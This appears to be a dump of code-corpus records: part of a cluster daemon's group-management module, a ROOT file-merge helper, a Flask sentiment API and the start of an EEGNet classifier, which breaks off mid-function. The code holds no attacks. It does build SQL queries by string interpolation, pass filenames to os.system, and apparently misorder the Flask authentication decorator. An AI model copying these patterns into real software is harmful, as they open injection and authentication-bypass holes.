{\n 'prescript': '',\n 'partscript': '',\n 'postscript': '',\n 'setupbmc': False,\n 'netboot': True,\n 'localinstall': False,\n 'bootmenu': False,\n }\n if request_data:\n newgroupname = None\n data = request_data['config']['group'][name]\n grp = Database().get_record(None, 'group', f' WHERE name = \"{name}\"')\n if grp:\n group_id = grp[0]['id']\n if 'newgroupname' in data:\n newgroupname = data['newgroupname']\n where = f' WHERE `name` = \"{newgroupname}\"'\n check_group = Database().get_record(None, 'group', where)\n if check_group:\n status=False\n return status, f'{newgroupname} Already present in database'\n data['name'] = data['newgroupname']\n del data['newgroupname']\n else:\n status=False\n return status, 'Destination group name not supplied'\n else:\n status=False,\n return status, f'Source group {name} does not exist'\n\n del grp[0]['id']\n for item in grp[0]:\n if item in data:\n data[item] = data[item]\n if item in items and isinstance(items[item], bool):\n data[item]=str(Helper().bool_to_string(data[item]))\n else:\n data[item] = grp[0][item]\n if item in items and isinstance(items[item], bool):\n data[item]=str(Helper().bool_to_string(data[item]))\n if item in items:\n data[item] = data[item] or items[item]\n if item in items and isinstance(items[item], bool):\n data[item]=str(Helper().bool_to_string(data[item]))\n if (not data[item]) and (item not in items):\n del data[item]\n if 'bmcsetupname' in data:\n bmcsetupname = data['bmcsetupname']\n data['bmcsetupid'] = Database().id_by_name('bmcsetup', data['bmcsetupname'])\n if data['bmcsetupid']:\n del data['bmcsetupname']\n else:\n status=False\n return status, f'BMC Setup {bmcsetupname} does not exist'\n if 'osimage' in data:\n osimage = data['osimage']\n del data['osimage']\n data['osimageid'] = Database().id_by_name('osimage', osimage)\n new_interface = None\n if 'interfaces' in data:\n new_interface = data['interfaces']\n del data['interfaces']\n group_columns = Database().get_columns('group')\n column_check = Helper().compare_list(data, group_columns)\n if column_check:\n row = Helper().make_rows(data)\n new_group_id = Database().insert('group', row)\n if not new_group_id:\n status=False\n return status, f'Group {newgroupname} is not created due to possible property clash'\n # response = f'Group {name} created successfully'\n response = f'Group {name} cloned as {newgroupname} successfully'\n status=True\n group_interfaces = Database().get_record_join(\n [\n 'groupinterface.interface',\n 'network.name as network',\n 'network.id as networkid',\n 'groupinterface.options'\n ],\n ['network.id=groupinterface.networkid'],\n [f\"groupid = '{group_id}'\"]\n )\n\n # ------ secrets ------\n secrets = Database().get_record(None, 'groupsecrets', f' WHERE groupid = \"{group_id}\"')\n for secret in secrets:\n del secret['id']\n secret['groupid'] = new_group_id\n row = Helper().make_rows(secret)\n result = Database().insert('groupsecrets', row)\n if not result:\n self.delete_group(new_group_id)\n status=False\n return status, f'Secrets copy for {newgroupname} failed'\n\n # ------ interfaces -------\n if new_interface:\n for ifx in new_interface:\n interface_name = ifx['interface']\n index = 0\n for grp_ifx in group_interfaces:\n # delete interfaces we already have\n if interface_name == grp_ifx['interface']:\n del group_interfaces[index]\n index += 1\n for ifx in new_interface:\n interface_name = ifx['interface']\n if 'network' not in ifx:\n status=False\n response=f'Network not specified for interface {interface_name}'\n break\n network = Database().id_by_name('network', ifx['network'])\n if network is None:\n status=False\n response=f'Network {network} does not exist'\n break\n else:\n ifx['networkid'] = network\n if 'options' in ifx:\n ifx['options'] = ifx['options'] or \"\"\n ifx['groupid'] = new_group_id\n del ifx['network']\n row = Helper().make_rows(ifx)\n Database().insert('groupinterface', row)\n\n if status is False:\n # rollback\n self.delete_group(new_group_id)\n return status, response\n\n for ifx in group_interfaces:\n ifx['groupid'] = new_group_id\n del ifx['network']\n row = Helper().make_rows(ifx)\n Database().insert('groupinterface', row)\n\n # ---- we call the group plugin - maybe someone wants to run something after clone?\n nodes_in_group = []\n group_details=Database().get_record_join(['node.name AS nodename'],['node.groupid=group.id'],[f\"`group`.name='{newgroupname}'\"])\n if group_details:\n for group_detail in group_details:\n nodes_in_group.append(group_detail['nodename'])\n group_plugins = Helper().plugin_finder(f'{self.plugins_path}/group')\n group_plugin=Helper().plugin_load(group_plugins,'group','default')\n try:\n group_plugin().postcreate(name=newgroupname, nodes=nodes_in_group)\n except Exception as exp:\n self.logger.error(f\"{exp}\")\n else:\n response = 'Invalid request: Columns are incorrect'\n status=False\n else:\n response = 'Invalid request: Did not receive data'\n status=False\n return status, response\n\n\n def delete_group_by_name(self, name=None):\n \"\"\"\n This method will delete a group by name.\n \"\"\"\n status=False\n response=f'Group {name} not present in database'\n where = f' WHERE `name` = \"{name}\"'\n group = Database().get_record(None, 'group', where)\n if group:\n status, response=self.delete_group(group[0]['id'])\n return status, response\n\n\n def delete_group(self, groupid=None):\n \"\"\"\n This method will delete a group.\n \"\"\"\n status=False\n where = f' WHERE `id` = \"{groupid}\"'\n group = Database().get_record(None, 'group', where)\n if group:\n name=group[0]['name']\n where = [{\"column\": \"id\", \"value\": groupid}]\n Database().delete_row('group', where)\n where = [{\"column\": \"groupid\", \"value\": group[0]['id']}]\n Database().delete_row('groupinterface', where)\n Database().delete_row('groupsecrets', where)\n response = f'Group {name} removed'\n status=True\n # ---- we call the group plugin - maybe someone wants to run something after delete?\n group_plugins = Helper().plugin_finder(f'{self.plugins_path}/group')\n group_plugin=Helper().plugin_load(group_plugins,'group','default')\n try:\n group_plugin().delete(name=name)\n except Exception as exp:\n self.logger.error(f\"{exp}\")\n else:\n response = 'Group not present in database'\n status=False\n return status, response\n", "repo_name": "clustervision/luna2-daemon", "sub_path": "daemon/base/group.py", "file_name": "group.py", "file_ext": "py", "file_size_in_byte": 28577, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.log.Log.get_logger", "line_number": 28, "usage_type": "call"}, {"api_name": "utils.log.Log", "line_number": 28, "usage_type": "name"}, {"api_name": "common.constant.CONSTANT", "line_number": 29, "usage_type": "name"}, {"api_name": "utils.database.Database", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 53, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 54, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 55, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 56, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 57, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 60, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 90, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 91, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 96, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 115, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 120, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 129, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 140, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 143, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 147, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 171, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 176, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 217, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 224, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 237, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 259, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 263, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 269, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 277, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 297, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 299, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 306, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 307, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 311, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 312, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 317, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 318, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 329, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 343, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 356, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 359, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 360, "usage_type": "call"}, {"api_name": "utils.queue.Queue", "line_number": 362, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 367, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 372, "usage_type": "call"}, {"api_name": "utils.queue.Queue", "line_number": 374, "usage_type": "call"}, {"api_name": "utils.queue.Queue", "line_number": 382, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 384, "usage_type": "call"}, {"api_name": "utils.config.Config", "line_number": 385, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 391, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 395, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 396, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 436, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 442, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 460, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 464, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 468, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 473, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 482, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 487, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 488, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 490, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 491, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 498, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 510, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 514, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 515, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 537, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 548, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 549, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 559, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 560, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 564, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 568, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 569, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 590, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 602, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 606, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 608, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 609, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 613, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 614, "usage_type": "call"}]} +{"seq_id": "20276586436", "text": "from __future__ import print_function\n\nimport os\nfrom builtins import input\nfrom builtins import map\nfrom functools import partial\nfrom multiprocessing import Pool\n\nfrom PyAnalysisTools.base.ShellUtils import move, remove_directory, make_dirs\n\n\ndef parallel_merge(data, output_path, prefix, merge_dir=None, force=False, postfix=None, ncpu=10):\n make_dirs(output_path)\n make_dirs(merge_dir)\n if merge_dir is None:\n merge_dir = output_path\n if len(os.listdir(merge_dir)) > 0:\n do_delete = input(\"Merge directory contains already files. Shall I delete those?: [y|n]\")\n if do_delete.lower() == \"y\" or do_delete.lower() == \"yes\":\n list([remove_directory(os.path.join(merge_dir, d)) for d in os.listdir(merge_dir)])\n\n pool = Pool(processes=min(ncpu, len(data)))\n pool.map(partial(parallel_merge_wrapper, output_path=output_path, prefix=prefix,\n merge_dir=merge_dir, force=force, postfix=postfix), data.items())\n\n\ndef parallel_merge_wrapper(dict_element, output_path, prefix, merge_dir=None, force=False, postfix=None):\n process, input_file_list = dict_element\n if merge_dir is not None:\n merge_dir = os.path.join(merge_dir, process)\n merge_files(input_file_list, output_path, prefix + \"{:s}\".format(process), merge_dir, force, postfix)\n\n\ndef merge_files(input_file_list, output_path, prefix, merge_dir=None, force=False, postfix=None):\n def build_buckets(file_list):\n limit = 2. * 1024. * 1024. * 1024.\n if sum(map(os.path.getsize, file_list)) < limit:\n return [file_list]\n bucket_list = []\n tmp = []\n summed_file_size = 0.\n for file_name in file_list:\n if summed_file_size > limit:\n summed_file_size = 0.\n bucket_list.append(tmp)\n tmp = []\n summed_file_size += os.path.getsize(file_name)\n tmp.append(file_name)\n bucket_list.append(tmp)\n return bucket_list\n\n def merge(file_lists):\n import time\n time.sleep(2)\n if len([f for chunk in file_lists for f in chunk]) == 0:\n return\n for file_list in file_lists:\n merge_cmd = 'nice -n 15 hadd '\n if force:\n merge_cmd += ' -f '\n if postfix is not None:\n output_file_name = '{:s}_{:d}.{:s}.root'.format(prefix, file_lists.index(file_list), postfix)\n else:\n output_file_name = '{:s}_{:d}.root'.format(prefix, file_lists.index(file_list))\n merge_cmd += '%s %s' % (output_file_name, ' '.join(file_list))\n if not force and os.path.exists(os.path.join(output_path, output_file_name)):\n continue\n os.system(merge_cmd)\n if not merge_dir == output_path:\n move(output_file_name, os.path.join(output_path, output_file_name))\n\n def setup_paths(merge_dir):\n if not os.path.exists(output_path):\n make_dirs(output_path)\n if merge_dir is None:\n merge_dir = output_path\n else:\n merge_dir = os.path.abspath(merge_dir)\n make_dirs(merge_dir)\n os.chdir(merge_dir)\n\n buckets = build_buckets(input_file_list)\n setup_paths(merge_dir)\n merge(buckets)\n if merge_dir is not None:\n remove_directory(os.path.abspath(merge_dir))\n", "repo_name": "morgenst/PyAnalysisTools", "sub_path": "PyAnalysisTools/base/IOTools.py", "file_name": "IOTools.py", "file_ext": "py", "file_size_in_byte": 3368, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyAnalysisTools.base.ShellUtils.make_dirs", "line_number": 13, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.ShellUtils.make_dirs", "line_number": 14, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 17, "usage_type": "call"}, {"api_name": "builtins.input", "line_number": 18, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.ShellUtils.remove_directory", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 20, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 22, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "builtins.map", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.system", "line_number": 68, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.ShellUtils.move", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.base.ShellUtils.make_dirs", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.base.ShellUtils.make_dirs", "line_number": 79, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 80, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.ShellUtils.remove_directory", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}]} +{"seq_id": "23209181395", "text": "from flask import Blueprint, request, jsonify\n\nfrom logging_setup.logger import ApiLogger\nfrom ..application.application_api import app_token_required\nfrom .sentiment_handlers import add_new_sentiment as sh\nfrom .models.UserOverallSentiments import UserOverallSentiments\nfrom .models.UserInteractionSentiment import UserInteractionSentiment\n\nsentiment_bp = Blueprint(\n \"sentiment_api\", \n __name__,\n url_prefix='/sentiment',\n template_folder='templates/sentiment')\n\n@app_token_required\n@sentiment_bp.route(\"/\", methods=['POST'])\ndef get_user_sentiment(userid, contentid):\n flow_id = \"get_user_sentiments\".upper()\n try:\n contentid = request.args.get('contentid', default=None, type=str)\n towardsuserid = request.args.get(\n 'towardsuserid', default=None, type=str)\n\n ApiLogger.log_debug(flow_id, \"Fetching overall sentiments for \",\n f\"User_sentiment - parameters userid: {userid} contentid: {contentid}\")\n if contentid == None:\n return jsonify(UserOverallSentiments.get_user_sentiment(userid))\n\n return jsonify(UserInteractionSentiment.get_user_sentiment_for_content(userid, contentid, towardsuserid))\n except:\n ApiLogger.log_exception(flow_id, \"Api exception\", \"\")\n raise\n\n@app_token_required\n@sentiment_bp.route(\"/\", methods=['POST'])\ndef set_user_sentiment():\n try:\n flow_id = \"set_user_sentiments\".upper()\n req = request\n ApiLogger.log_debug(flow_id, \"Api Begin\",\n f\"set user sentiments - {request.json}\")\n return jsonify(sh.set_user_sentiment(request.json, flow_id))\n except:\n ApiLogger.log_exception(flow_id, \"Api exception\", \"\")\n raise\n\n@app_token_required\n@sentiment_bp.route(\"/check\", methods=['POST'])\ndef analyze_sentiment():\n try:\n flow_id = \"Analyze_sentiment\".upper()\n ApiLogger.log_debug(flow_id, \"Api Begin\", f\"{request.json}\")\n\n return jsonify(sh.get_sentiments_of_content(request.json, flow_id))\n except:\n ApiLogger.log_exception(flow_id, \"Api exception\", \"\")\n raise\n", "repo_name": "Pbasnal/flask-twitterclone", "sub_path": "api/blueprints/sentiment/sentiment_api.py", "file_name": "sentiment_api.py", "file_ext": "py", "file_size_in_byte": 2109, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Blueprint", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_debug", "line_number": 24, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 27, "usage_type": "call"}, {"api_name": "models.UserOverallSentiments.UserOverallSentiments.get_user_sentiment", "line_number": 27, "usage_type": "call"}, {"api_name": "models.UserOverallSentiments.UserOverallSentiments", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 29, "usage_type": "call"}, {"api_name": "models.UserInteractionSentiment.UserInteractionSentiment.get_user_sentiment_for_content", "line_number": 29, "usage_type": "call"}, {"api_name": "models.UserInteractionSentiment.UserInteractionSentiment", "line_number": 29, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_exception", "line_number": 31, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 31, "usage_type": "name"}, {"api_name": "application.application_api.app_token_required", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_debug", "line_number": 40, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 42, "usage_type": "call"}, {"api_name": "sentiment_handlers.add_new_sentiment.set_user_sentiment", "line_number": 42, "usage_type": "call"}, {"api_name": "sentiment_handlers.add_new_sentiment", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 42, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 42, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_exception", "line_number": 44, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 44, "usage_type": "name"}, {"api_name": "application.application_api.app_token_required", "line_number": 34, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_debug", "line_number": 52, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 54, "usage_type": "call"}, {"api_name": "sentiment_handlers.add_new_sentiment.get_sentiments_of_content", "line_number": 54, "usage_type": "call"}, {"api_name": "sentiment_handlers.add_new_sentiment", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 54, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_exception", "line_number": 56, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 56, "usage_type": "name"}, {"api_name": "application.application_api.app_token_required", "line_number": 47, "usage_type": "name"}]} +{"seq_id": "13874924436", "text": "import torch\nimport scipy.io as sio\nimport numpy as np\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport matplotlib.pyplot as plt\nimport mne\n\nfrom scipy.integrate import simps\nfrom mne.time_frequency import psd_array_multitaper\n\nfrom torch.optim.lr_scheduler import StepLR, ReduceLROnPlateau\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.autograd import Variable\nfrom torch.utils.tensorboard import SummaryWriter\nfrom matplotlib.collections import LineCollection\nimport matplotlib.gridspec as gridspec\nfrom adhd_classification import data_load\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_auc_score, precision_score, recall_score, accuracy_score,confusion_matrix,roc_curve,f1_score\n\nfrom electrodes_positions import get_electrodes_coordinates, set_electrodes_montage, get_electrodes_positions\nfrom early_stopping import EarlyStopping\nPATH_DATASET_MAT= r\"C:\\Users\\Ahmed Guebsi\\Downloads\\ADHD_part1\"\n\n\ntorch.cuda.empty_cache()\ntorch.manual_seed(0)\nnp.random.seed(0)\nplt.rcParams.update({'font.size': 14})\n\n\nclass EEGNet(torch.nn.Module):\n def __init__(self, channelnum=19):\n super(EEGNet, self).__init__()\n\n # model parameters\n self.eps = 1e-05\n\n self.f1 = 8\n self.d = 2\n self.conv1 = torch.nn.Conv2d(1, self.f1, (1, 64), padding=(0, 32), bias=False)\n self.batchnorm1 = torch.nn.BatchNorm2d(self.f1, track_running_stats=False)\n self.batchnorm2 = torch.nn.BatchNorm2d(self.f1 * self.d, track_running_stats=False)\n self.batchnorm3 = torch.nn.BatchNorm2d(self.f1 * self.d, track_running_stats=False)\n self.activ1 = torch.nn.ELU()\n self.activ2 = torch.nn.ELU()\n self.depthconv = torch.nn.Conv2d(self.f1, self.f1 * self.d, (19, 1), groups=self.f1, bias=False)\n self.avgpool = torch.nn.AvgPool2d((1, 4))\n self.separable = torch.nn.Conv2d(self.f1 * self.d, self.f1 * self.d, (1, 16), padding=(0, 8),\n groups=self.f1 * self.d, bias=False)\n self.fc1 = torch.nn.Linear(256, 2) # 128\n self.softmax = nn.LogSoftmax(dim=1)\n self.softmax1 = nn.Softmax(dim=1)\n self.dropout = nn.Dropout(p=0.5)\n\n # parameters for the interpretation techniques\n self.batch_mean1 = 0\n self.batch_std1 = 0\n self.gamma1 = 0\n self.beta1 = 0\n self.batch_mean2 = 0\n self.batch_std2 = 0\n self.gamma2 = 0\n self.beta2 = 0\n self.batch_mean3 = 0\n self.batch_std3 = 0\n self.gamma3 = 0\n self.beta3 = 0\n self.activ_in1 = 0\n self.activ_out1 = 0\n self.activ_baseline_in1 = 0\n self.activ_baseline_out1 = 0\n self.activ_in2 = 0\n self.activ_out2 = 0\n self.activ_baseline_in2 = 0\n self.activ_baseline_out2 = 0\n\n def forward(self, inputdata):\n intermediate = self.conv1(inputdata)\n\n intermediate = self.batchnorm1(intermediate)\n\n intermediate = self.depthconv(intermediate)\n\n intermediate = self.batchnorm2(intermediate)\n\n intermediate = self.activ1(intermediate)\n\n intermediate = F.avg_pool2d(intermediate, (1, 4))\n\n intermediate = self.dropout(intermediate)\n\n intermediate = self.separable(intermediate)\n\n intermediate = self.batchnorm3(intermediate)\n\n intermediate = self.activ2(intermediate)\n\n intermediate = F.avg_pool2d(intermediate, (1, 8))\n\n intermediate = self.dropout(intermediate)\n\n intermediate = intermediate.view(intermediate.size()[0], -1)\n\n intermediate = self.fc1(intermediate)\n\n output = self.softmax(intermediate)\n print(output.shape)\n print(output)\n\n return output\n\n def update_softmax_forward(self):\n def softmax_forward_hook_function(module, ten_in, ten_out):\n return ten_in[0]\n\n handle = self.softmax.register_forward_hook(softmax_forward_hook_function)\n\n return handle\n\n # make the batch normalization layer a linear operation before applying backpropagation to remove the effects of other samples in the batch\n\n def update_batch_forward(self):\n def batch_forward_hook_function1(module, ten_in, ten_out):\n data = ten_in[0]\n batchmean1 = self.batch_mean1.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n batchstd1 = self.batch_std1.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n data = torch.div((ten_in[0] - batchmean1), batchstd1)\n gammamatrix = (self.gamma1).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n betamatrix = (self.beta1).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n output = data * gammamatrix + betamatrix\n\n return output\n\n def batch_forward_hook_function2(module, ten_in, ten_out):\n data = ten_in[0]\n batchmean2 = self.batch_mean2.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n batchstd2 = self.batch_std2.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n data = torch.div((ten_in[0] - batchmean2), batchstd2)\n gammamatrix = (self.gamma2).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n betamatrix = (self.beta2).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n output = data * gammamatrix + betamatrix\n\n return output\n\n def batch_forward_hook_function3(module, ten_in, ten_out):\n data = ten_in[0]\n batchmean3 = self.batch_mean3.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n batchstd3 = self.batch_std3.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n data = torch.div((ten_in[0] - batchmean3), batchstd3)\n gammamatrix = (self.gamma3).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n betamatrix = (self.beta3).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n output = data * gammamatrix + betamatrix\n\n return output\n\n handle1 = self.batchnorm1.register_forward_hook(batch_forward_hook_function1)\n handle2 = self.batchnorm2.register_forward_hook(batch_forward_hook_function2)\n handle3 = self.batchnorm3.register_forward_hook(batch_forward_hook_function3)\n\n return [handle1, handle2, handle3]\n\n # Save the batch mean and std\n\n def update_batch_forward_meanstd(self):\n def batch_forward_hook_function1(module, ten_in, ten_out):\n data = ten_in[0].clone().detach().requires_grad_(False).cpu().double()\n\n self.batch_mean1 = torch.mean(data, [0, 2, 3], True)\n self.batch_std1 = torch.sqrt(torch.mean((data - self.batch_mean1) ** 2, [0, 2, 3], True) + self.eps)\n\n self.gamma1 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n self.beta1 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n\n self.gamma1[0, :, 0, 0] = self.batchnorm1.weight.clone().detach().requires_grad_(False).cpu()\n self.beta1[0, :, 0, 0] = self.batchnorm1.bias.clone().detach().requires_grad_(False).cpu()\n\n def batch_forward_hook_function2(module, ten_in, ten_out):\n data = ten_in[0].clone().detach().requires_grad_(False).cpu().double()\n\n self.batch_mean2 = torch.mean(data, [0, 2, 3], True)\n self.batch_std2 = torch.sqrt(torch.mean((data - self.batch_mean2) ** 2, [0, 2, 3], True) + self.eps)\n\n self.gamma2 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n self.beta2 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n\n self.gamma2[0, :, 0, 0] = self.batchnorm2.weight.clone().detach().requires_grad_(False).cpu()\n self.beta2[0, :, 0, 0] = self.batchnorm2.bias.clone().detach().requires_grad_(False).cpu()\n\n def batch_forward_hook_function3(module, ten_in, ten_out):\n data = ten_in[0].clone().detach().requires_grad_(False).cpu().double()\n\n 